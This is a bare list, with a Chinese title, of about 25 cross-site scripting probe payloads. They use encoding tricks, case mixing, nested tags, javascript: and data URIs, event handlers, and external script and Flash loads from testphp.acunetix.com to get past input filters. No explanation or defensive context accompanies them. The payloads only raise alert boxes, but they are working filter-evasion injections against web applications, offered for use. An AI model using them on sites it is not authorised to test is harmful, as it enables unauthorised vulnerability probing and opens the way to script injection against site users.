XSS的一些简单探测脚本

alert(123456)%3B
>’><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>
>”><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>
</textarea><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>
</title><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>
–><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>
email@some<ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>domain.com
[img]JaVaScRiPt:alert(123456)%3B[/img]
%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28123456%29%3B%22%3E
<%00script>alert(123456)%3B</script>
<scrip<script>t>alert(123456)%3B</scrip</script>t>
<DIV+STYLE=”width:expression(alert(123456))%3B”>
<FRAMESET><FRAME+SRC=”JaVaS%26%2399%3BRiPt:alert(123456)%3B”></FRAMESET>
%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28123456%29%3B%22%3E
<META+HTTP-EQUIV=”refresh”+CONTENT=”0%3Burl=JaVaS%26%2399%3BRiPt:alert(123456)%3B”>
<iframe+src=”data:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=”+invalid=”123456″>
<embed+src=”[url]http://testphp.acunetix.com/xss.swf?123456[/url]”+type=”application/x-shockwave-flash”/>
<body+onload=alert(123456)>
ScRiPt+src=http://testphp.acunetix.com/xss.js?123456></ScRiPt>
<script/xss+src=http://testphp.acunetix.com/xss.js?123456></script>
<img+src=http://testphp.acunetix.com/dot.gif+onload=alert(123456)>
+style=’background:url(JaVaScRiPt:alert(123456))’+invalidparam=’
%253CScRiPt%253Ealert(123456)%3B%253C/ScRiPt%253E
<ScRiPt+bad=”>”+src=”[url]http://testphp.acunetix.com/xss.js?123456[/url]”></ScRiPt>
“+onmouseover=”alert(123456)
</div><ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>